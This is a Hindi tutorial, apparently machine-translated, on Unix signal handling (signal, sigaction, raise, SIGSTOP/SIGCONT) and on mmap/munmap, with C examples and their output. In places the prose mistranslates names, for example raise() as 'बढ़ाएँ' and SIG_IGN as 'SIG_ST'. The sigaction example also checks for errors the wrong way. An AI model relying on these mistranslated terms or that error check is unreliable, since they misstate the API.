अब, सिग्नल () सिस्टम कॉल का उपयोग करके इस विशेष सिग्नल को संभालने के लिए कोड को संशोधित करते हैं।

/* signal_fpe_handler.c */
#include<stdio.h>
#include<signal.h>
#include<stdlib.h>

void handler_dividebyzero(int signum);

int main() {
   int result;
   int v1, v2;
   void (*sigHandlerReturn)(int);
   sigHandlerReturn = signal(SIGFPE, handler_dividebyzero);
   if (sigHandlerReturn == SIG_ERR) {
      perror("Signal Error: ");
      return 1;
   }
   v1 = 121;
   v2 = 0;
   result = v1/v2;
   printf("Result of Divide by Zero is %d\n", result);
   return 0;
}

void handler_dividebyzero(int signum) {
   if (signum == SIGFPE) {
      printf("Received SIGFPE, Divide by Zero Exception\n");
      exit (0);
   } 
   else
      printf("Received %d Signal\n", signum);
      return;
}

संकलन और निष्पादन कदम

Received SIGFPE, Divide by Zero Exception

जैसा कि चर्चा की गई है, सिग्नल सिस्टम द्वारा उत्पन्न होते हैं (कुछ संचालन जैसे कि शून्य से विभाजित करने पर, आदि) या उपयोगकर्ता प्रोग्रामेटिक रूप से भी सिग्नल उत्पन्न कर सकता है। यदि आप प्रोग्रामेटिक रूप से सिग्नल उत्पन्न करना चाहते हैं, तो लाइब्रेरी फंक्शन बढ़ाएँ () का उपयोग करें।

अब, हम एक अन्य कार्यक्रम लेते हैं जो सिग्नल को संभालने और अनदेखा करने का प्रदर्शन करता है।

मान लें कि हमने एक सिग्नल बढ़ाकर () का उपयोग किया है, तब क्या होता है? सिग्नल बढ़ाने के बाद, वर्तमान प्रक्रिया का निष्पादन बंद हो जाता है। फिर रुकी हुई प्रक्रिया का क्या होता है? दो परिदृश्य हो सकते हैं - सबसे पहले, जब भी आवश्यक हो निष्पादन जारी रखें। दूसरी, प्रक्रिया को (मार कमान के साथ) समाप्त करें।

रुकी हुई प्रक्रिया का निष्पादन जारी रखने के लिए, उस विशेष प्रक्रिया में SIGCONT भेजें। निष्पादन को जारी रखने के लिए आप fg (अग्रभूमि) या bg (पृष्ठभूमि) कमांड भी जारी कर सकते हैं। यहां, आदेश केवल अंतिम प्रक्रिया के निष्पादन को फिर से शुरू करेंगे। यदि एक से अधिक प्रक्रिया रोक दी जाती है, तो केवल अंतिम प्रक्रिया फिर से शुरू की जाती है। यदि आप पहले से बंद की गई प्रक्रिया को फिर से शुरू करना चाहते हैं, तो जॉब नंबर के साथ नौकरियों (एफजी / बीजी का उपयोग करके) को फिर से शुरू करें।

निम्नलिखित प्रोग्राम का उपयोग सिगस्ट () (फंक्शन) का उपयोग करके सिग्नल को बढ़ाने के लिए किया जाता है। सीटीजी + जेड (कंट्रोल + जेड) कुंजी के उपयोगकर्ता प्रेस द्वारा सिग्नल सिग्स्टॉप भी उत्पन्न किया जा सकता है। यह संकेत जारी करने के बाद, प्रोग्राम निष्पादित करना बंद कर देगा। निष्पादन जारी रखने के लिए संकेत (SIGCONT) भेजें।

निम्नलिखित उदाहरण में, हम कमांड एफजी के साथ रुकी हुई प्रक्रिया को फिर से शुरू कर रहे हैं।

/* signal_raising.c */
#include<stdio.h>
#include<signal.h>
#include<stdlib.h>

int main() {
   printf("Testing SIGSTOP\n");
   raise(SIGSTOP);
   return 0;
}

संकलन और निष्पादन कदम

Testing SIGSTOP
[1]+ Stopped ./a.out
./a.out

अब, दूसरे प्रोग्राम को दूसरे टर्मिनल से SIGCONT जारी करके रुकी हुई प्रक्रिया के निष्पादन को जारी रखने के लिए बढ़ाएं।

/* signal_stop_continue.c */
#include<stdio.h>
#include<signal.h>
#include <sys/types.h>
#include <unistd.h>

void handler_sigtstp(int signum);

int main() {
   pid_t pid;
   printf("Testing SIGSTOP\n");
   pid = getpid();
   printf("Open Another Terminal and issue following command\n");
   printf("kill -SIGCONT %d or kill -CONT %d or kill -18 %d\n", pid, pid, pid);
   raise(SIGSTOP);
   printf("Received signal SIGCONT\n");
   return 0;
}

संकलन और निष्पादन कदम

Testing SIGSTOP
Open Another Terminal and issue following command
kill -SIGCONT 30379 or kill -CONT 30379 or kill -18 30379
[1]+ Stopped ./a.out

Received signal SIGCONT
[1]+ Done ./a.out

दूसरे टर्मिनल में

kill -SIGCONT 30379

अब तक, हमने उस प्रोग्राम को देखा है जो सिस्टम द्वारा उत्पन्न सिग्नल को संभालता है। अब, प्रोग्राम के माध्यम से उत्पन्न सिग्नल को देखते हैं (उठाना () फ़ंक्शन का उपयोग करके या किल कमांड के माध्यम से)। यह कार्यक्रम सिग्नल SIGTSTP (टर्मिनल स्टॉप) उत्पन्न करता है, जिसकी डिफ़ॉल्ट कार्रवाई निष्पादन को रोकना है। हालांकि, चूंकि हम डिफ़ॉल्ट कार्रवाई के बजाय अब सिग्नल को संभाल रहे हैं, यह परिभाषित हैंडलर के पास आएगा। इस मामले में, हम केवल संदेश प्रिंट कर रहे हैं और बाहर निकल रहे हैं।

/* signal_raising_handling.c */
#include<stdio.h>
#include<signal.h>
#include<stdlib.h>

void handler_sigtstp(int signum);

int main() {
   void (*sigHandlerReturn)(int);
   sigHandlerReturn = signal(SIGTSTP, handler_sigtstp);
   if (sigHandlerReturn == SIG_ERR) {
      perror("Signal Error: ");
      return 1;
   }
   printf("Testing SIGTSTP\n");
   raise(SIGTSTP);
   return 0;
}

void handler_sigtstp(int signum) {
   if (signum == SIGTSTP) {
      printf("Received SIGTSTP\n");
      exit(0);
   }
   else
      printf("Received %d Signal\n", signum);
      return;
}

संकलन और निष्पादन कदम

Testing SIGTSTP
Received SIGTSTP

हमने डिफ़ॉल्ट कार्रवाई करने या सिग्नल को संभालने के उदाहरणों को देखा है। अब, संकेत को अनदेखा करने का समय आ गया है। यहां, इस नमूना कार्यक्रम में, हम SIG_ST के माध्यम से उपेक्षा करने के लिए संकेत SIGTSTP को पंजीकृत कर रहे हैं और फिर हम संकेत SIGTSTP (टर्मिनल स्टॉप) बढ़ा रहे हैं। जब संकेत SIGTSTP उत्पन्न हो रहा है जिसे अनदेखा किया जाएगा।

/* signal_raising_ignoring.c */
#include<stdio.h>
#include<signal.h>
#include<stdlib.h>

void handler_sigtstp(int signum);

int main() {
   void (*sigHandlerReturn)(int);
   sigHandlerReturn = signal(SIGTSTP, SIG_IGN);
   if (sigHandlerReturn == SIG_ERR) {
      perror("Signal Error: ");
      return 1;
   }
   printf("Testing SIGTSTP\n");
   raise(SIGTSTP);
   printf("Signal SIGTSTP is ignored\n");
   return 0;
}

संकलन और निष्पादन कदम

Testing SIGTSTP
Signal SIGTSTP is ignored

अब तक, हमने देखा है कि एक सिग्नल को संभालने के लिए हमारे पास एक सिग्नल हैंडलर है। क्या कई संकेतों को संभालने के लिए हमारे पास एक ही हैंडलर हो सकता है? इसका जवाब है हाँ। आइए एक कार्यक्रम के साथ इस पर विचार करें।

निम्नलिखित कार्यक्रम निम्नलिखित करता है -

Step 1 - सिग्नल को पकड़ने या संभालने के लिए एक हैंडलर (हैंडसाइनल्स) रजिस्टर करता है SIGINT (CTRL + C) या SIGQUIT (CTRL + \)

Step 2 - यदि उपयोगकर्ता संकेत SIGQUIT उत्पन्न करता है (या तो CTRL + \ के साथ किल कमांड या कीबोर्ड कंट्रोल के माध्यम से), हैंडलर केवल संदेश को रिटर्न के रूप में प्रिंट करता है।

Step 3 - यदि उपयोगकर्ता पहली बार सीटीआईआईआरटी (सीटीआरएल + सी के साथ किल कमांड या कीबोर्ड कंट्रोल के माध्यम से) सिग्नल उत्पन्न करता है, तो यह अगली बार से डिफ़ॉल्ट कार्रवाई (SIG_DFL के साथ) करने के लिए सिग्नल को संशोधित करता है।

Step 4 - यदि उपयोगकर्ता दूसरी बार संकेत SIGINT बनाता है, तो यह एक डिफ़ॉल्ट कार्रवाई करता है, जो प्रोग्राम की समाप्ति है।

/* Filename: sigHandler.c */
#include<stdio.h>
#include<unistd.h>
#include<signal.h>

void handleSignals(int signum);

int main(void) {
   void (*sigHandlerInterrupt)(int);
   void (*sigHandlerQuit)(int);
   void (*sigHandlerReturn)(int);
   sigHandlerInterrupt = sigHandlerQuit = handleSignals;
   sigHandlerReturn = signal(SIGINT, sigHandlerInterrupt);
   if (sigHandlerReturn == SIG_ERR) {
      perror("signal error: ");
      return 1;
   }
   sigHandlerReturn = signal(SIGQUIT, sigHandlerQuit);
   
   if (sigHandlerReturn == SIG_ERR) {
      perror("signal error: ");
      return 1;
   }
   while (1) {
      printf("\nTo terminate this program, perform the following: \n");
      printf("1. Open another terminal\n");
      printf("2. Issue command: kill %d or issue CTRL+C 2 times (second time it terminates)\n", getpid());
      sleep(10);
   }
   return 0;
}

void handleSignals(int signum) {
   switch(signum) {
      case SIGINT:
      printf("\nYou pressed CTRL+C \n");
      printf("Now reverting SIGINT signal to default action\n");
      signal(SIGINT, SIG_DFL);
      break;
      case SIGQUIT:
      printf("\nYou pressed CTRL+\\ \n");
      break;
      default:
      printf("\nReceived signal number %d\n", signum);
      break;
   }
   return;
}

संकलन और निष्पादन कदम

To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 74 or issue CTRL+C 2 times (second time it terminates)
^C
You pressed CTRL+C
Now reverting SIGINT signal to default action
          
To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 74 or issue CTRL+C 2 times (second time it terminates)
^\You pressed CTRL+\
To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 120
Terminated

एक और टर्मिनल

kill 71

दूसरी विधि

To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 71 or issue CTRL+C 2 times (second time it terminates)
^C
You pressed CTRL+C
Now reverting SIGINT signal to default action

To terminate this program, perform the following:
1. Open another terminal
2. Issue command: kill 71 or issue CTRL+C 2 times (second time it terminates)
^C

हम जानते हैं कि किसी सिग्नल को संभालने के लिए, हमारे पास दो सिस्टम कॉल होते हैं, या तो सिग्नल () या सिगनेशन ()। अब तक हमने सिग्नल () सिस्टम कॉल के साथ देखा है, अब यह सिगनेशन () सिस्टम कॉल का समय है। आइए हम उपरोक्त कार्यक्रम को सिगनेशन () का उपयोग करने के लिए संशोधित करते हैं -

/* Filename: sigHandlerSigAction.c */
#include<stdio.h>
#include<unistd.h>
#include<signal.h>

void handleSignals(int signum);

int main(void) {
   void (*sigHandlerReturn)(int);
   struct sigaction mysigaction;
   mysigaction.sa_handler = handleSignals;
   sigemptyset(&mysigaction.sa_mask);
   mysigaction.sa_flags = 0;
   sigaction(SIGINT, &mysigaction, NULL);
   
   if (mysigaction.sa_handler == SIG_ERR) {
      perror("signal error: ");
      return 1;
   }
   mysigaction.sa_handler = handleSignals;
   sigemptyset(&mysigaction.sa_mask);
   mysigaction.sa_flags = 0;
   sigaction(SIGQUIT, &mysigaction, NULL);
   
   if (mysigaction.sa_handler == SIG_ERR) {
      perror("signal error: ");
      return 1;
   }
   while (-1) {
      printf("\nTo terminate this program, perform either of the following: \n");
      printf("1. Open another terminal and issue command: kill %d\n", getpid());
      printf("2. Issue CTRL+C 2 times (second time it terminates)\n");
      sleep(10);
   }
   return 0;
}

void handleSignals(int signum) {
   switch(signum) {
      case SIGINT:
      printf("\nYou have entered CTRL+C \n");
      printf("Now reverting SIGINT signal to perform default action\n");
      signal(SIGINT, SIG_DFL);
      break;
      case SIGQUIT:
      printf("\nYou have entered CTRL+\\ \n");
      break;
      default:
      printf("\nReceived signal number %d\n", signum);
      break;
   }
   return;
}

हमें संकलन और निष्पादन प्रक्रिया देखें। निष्पादन प्रक्रिया में, हम दो बार CTRL + C जारी करते हैं, शेष चेक / तरीके (ऊपर दिए गए) आप इस कार्यक्रम के लिए भी कोशिश कर सकते हैं।

संकलन और निष्पादन कदम

To terminate this program, perform either of the following:
1. Open another terminal and issue command: kill 3199
2. Issue CTRL+C 2 times (second time it terminates)
^C
You have entered CTRL+C
Now reverting SIGINT signal to perform default action
To terminate this program, perform either of the following:
1. Open another terminal and issue command: kill 3199
2. Issue CTRL+C 2 times (second time it terminates)
^C

Mmap () सिस्टम कॉल कॉलिंग प्रक्रिया के वर्चुअल एड्रेस स्पेस में मैपिंग प्रदान करता है जो फाइलों या उपकरणों को मेमोरी में मैप करता है। यह दो प्रकार का है -

File mapping or File-backed mapping- यह मैपिंग फाइलों में प्रोसेस की वर्चुअल मेमोरी के एरिया को मैप करता है। इसका मतलब है कि मेमोरी के उन क्षेत्रों को पढ़ना या लिखना फ़ाइल को पढ़ने या लिखने का कारण बनता है। यह डिफ़ॉल्ट मैपिंग प्रकार है।

Anonymous mapping- यह मैपिंग किसी भी फ़ाइल द्वारा समर्थित बिना वर्चुअल मेमोरी की प्रक्रिया के क्षेत्र को मैप करती है। सामग्री शून्य से आरंभ की जाती है। यह मैपिंग डायनामिक मेमोरी एलोकेशन (मॉलोक) () के समान है और कुछ आवंटन के लिए कुछ मॉलोक () कार्यान्वयन में उपयोग किया जाता है।

एक प्रक्रिया मैपिंग में मेमोरी अन्य प्रक्रियाओं में मैपिंग के साथ साझा की जा सकती है। इसे दो तरीकों से किया जा सकता है -

  • जब दो प्रक्रियाएं फ़ाइल के समान क्षेत्र को मैप करती हैं, तो वे भौतिक मेमोरी के समान पृष्ठ साझा करते हैं।

  • यदि एक बच्चे की प्रक्रिया बनाई जाती है, तो यह माता-पिता के मानचित्रण को विरासत में प्राप्त करता है और ये मैपिंग माता-पिता की शारीरिक स्मृति के समान पृष्ठों को संदर्भित करते हैं। बाल प्रक्रिया में डेटा के किसी भी परिवर्तन पर, बच्चे की प्रक्रिया के लिए अलग-अलग पृष्ठ बनाए जाएंगे।

जब दो या दो से अधिक प्रक्रियाएं समान पृष्ठ साझा करती हैं, तो प्रत्येक प्रक्रिया मैपिंग प्रकार के आधार पर अन्य प्रक्रियाओं द्वारा बनाई गई पृष्ठ सामग्री के परिवर्तन देख सकती है। मानचित्रण प्रकार निजी या साझा किया जा सकता है -

Private Mapping (MAP_PRIVATE) - इस मैपिंग की सामग्री में संशोधन अन्य प्रक्रियाओं के लिए दिखाई नहीं देता है और मैपिंग को अंतर्निहित फ़ाइल तक नहीं ले जाया जाता है।

Shared Mapping (MAP_SHARED) - इस मैपिंग की सामग्री में संशोधन अन्य प्रक्रियाओं के लिए दिखाई देते हैं और मैपिंग को अंतर्निहित फ़ाइल में ले जाया जाता है।

#include <sys/mman.h>

void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);

उपरोक्त सिस्टम कॉल सफलता पर मैपिंग का प्रारंभिक पता देता है या त्रुटि पर MAP_FAILED।

वर्चुअल एड्रेस एड्र, कर्नेल द्वारा निर्दिष्ट या उत्पन्न उपयोगकर्ता हो सकता है (एडल पास करने पर NULL)। इंगित की गई फ़ील्ड लंबाई बाइट्स में मैपिंग के आकार की आवश्यकता होती है। क्षेत्र विरोध मेमोरी प्रोटेक्शन वैल्यू को इंगित करता है जैसे कि PROT_NONE, PROT_READ, PROT_WRITE, PROT_EXEC का मतलब उन क्षेत्रों से है, जो क्रमशः एक्सेस, रीड, राइट या एक्जीक्यूट नहीं हो सकते हैं। यह मान एकल (PROT_NONE) हो सकता है या किसी भी तीन झंडे (अंतिम 3) के साथ ओआरडी हो सकता है। क्षेत्र के झंडे या तो मैपिंग प्रकार या MAP_PRIVATE या MAP_SHARED इंगित करते हैं। फ़ील्ड 'fd' फ़ाइल डिस्क्रिप्टर को मैप करने वाली फ़ाइल की पहचान करने वाली फ़ाइल को इंगित करता है और फ़ील्ड 'ऑफसेट' से तात्पर्य फ़ाइल के शुरुआती बिंदु से है, यदि पूरी फ़ाइल को मैप करने की आवश्यकता हो, तो ऑफसेट शून्य होना चाहिए।

#include <sys/mman.h>

int munmap(void *addr, size_t length);

उपरोक्त सिस्टम सफलता पर 0 या त्रुटि पर -1 रिटर्न करता है।

सिस्टम कॉल मूनमैप, पहले से ही मेमोरी मैप किए गए क्षेत्र की अनमैपिंग करता है। फ़ील्ड एड्र मैपिंग के शुरुआती पते को इंगित करता है और लंबाई मैपिंग के बाइट्स में आकार को इंगित करता है कि उन्हें अनमैप किया जाए। आमतौर पर, मैपिंग और अनमैपिंग पूरे मैपेड क्षेत्रों के लिए होगा। यदि इसे अलग करना है, तो इसे दो हिस्सों में सिकुड़ जाना चाहिए या काट देना चाहिए। अगर एड्र का कोई मैपिंग नहीं है तो इस कॉल का कोई असर नहीं होगा और कॉल 0 (सफलता) लौटाता है।

आइए एक उदाहरण पर विचार करें -

Step 1 फाइल में अल्फा न्यूमेरिक अक्षर नीचे दिखाए गए अनुसार -

0 1 2 25 26 27 28 29 30 31 32 33 34 35 36 37 38 59 60 61
A B C Z 0 1 2 3 4 5 6 7 8 9 A b c x y z

Step 2- mmap () सिस्टम कॉल का उपयोग करके फ़ाइल सामग्री को मेमोरी में मैप करें। यह स्मृति में मैप किए जाने के बाद प्रारंभ पता लौटाएगा।

Step 3- सरणी संकेतन का उपयोग करके फ़ाइल सामग्री तक पहुंचें (पॉइंटर संकेतन के साथ भी पहुंच सकते हैं) क्योंकि महंगी रीड () सिस्टम कॉल नहीं पढ़ती है। मेमोरी मैपिंग का उपयोग करते हुए, यूजर स्पेस, कर्नेल स्पेस बफर और बफर कैश के बीच कई कॉपी करने से बचें।

Step 4 - जब तक उपयोगकर्ता "-1" (प्रवेश के अंत का संकेत नहीं करता) तक फ़ाइल सामग्री को पढ़ना न भूलें।

Step 5 - साफ-सुथरी गतिविधियां करें अर्थात, मैप किए गए मेमोरी क्षेत्र (मूनमैप ()) को अनमैप करके, फाइल को बंद करें और फाइल को हटा दें।

/* Filename: mmap_test.c */
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/mman.h>
void write_mmap_sample_data();

int main() {
   struct stat mmapstat;
   char *data;
   int minbyteindex;
   int maxbyteindex;
   int offset;
   int fd;
   int unmapstatus;
   write_mmap_sample_data();
   if (stat("MMAP_DATA.txt", &mmapstat) == -1) {
      perror("stat failure");
      return 1;
   }
   
   if ((fd = open("MMAP_DATA.txt", O_RDONLY)) == -1) {
      perror("open failure");
      return 1;
   }
   data = mmap((caddr_t)0, mmapstat.st_size, PROT_READ, MAP_SHARED, fd, 0);
   
   if (data == (caddr_t)(-1)) {
      perror("mmap failure");
      return 1;
   }
   minbyteindex = 0;
   maxbyteindex = mmapstat.st_size - 1;
   
   do {
      printf("Enter -1 to quit or ");
      printf("enter a number between %d and %d: ", minbyteindex, maxbyteindex);
      scanf("%d",&offset);
      if ( (offset >= 0) && (offset <= maxbyteindex) )
      printf("Received char at %d is %c\n", offset, data[offset]);
      else if (offset != -1)
      printf("Received invalid index %d\n", offset);
   } while (offset != -1);
   unmapstatus = munmap(data, mmapstat.st_size);
   
   if (unmapstatus == -1) {
      perror("munmap failure");
      return 1;
   }
   close(fd);
   system("rm -f MMAP_DATA.txt");
   return 0;
}

void write_mmap_sample_data() {
   int fd;
   char ch;
   struct stat textfilestat;
   fd = open("MMAP_DATA.txt", O_CREAT|O_TRUNC|O_WRONLY, 0666);
   if (fd == -1) {
      perror("File open error ");
      return;
   }
   // Write A to Z
   ch = 'A';
   
   while (ch <= 'Z') {
      write(fd, &ch, sizeof(ch));
      ch++;
   }
   // Write 0 to 9
   ch = '0';
   
   while (ch <= '9') {
      write(fd, &ch, sizeof(ch));
      ch++;
   }
   // Write a to z
   ch = 'a';
   
   while (ch <= 'z') {
      write(fd, &ch, sizeof(ch));
      ch++;
   }
   close(fd);
   return;
}

उत्पादन

Enter -1 to quit or enter a number between 0 and 61: 3 
Received char at 3 is D 
Enter -1 to quit or enter a number between 0 and 61: 28
Received char at 28 is 2 
Enter -1 to quit or enter a number between 0 and 61: 38 
Received char at 38 is c 
Enter -1 to quit or enter a number between 0 and 61: 59 
Received char at 59 is x 
Enter -1 to quit or enter a number between 0 and 61: 65 
Received invalid index 65 
Enter -1 to quit or enter a number between 0 and 61: -99 
Received invalid index -99 
Enter -1 to quit or enter a number between 0 and 61: -1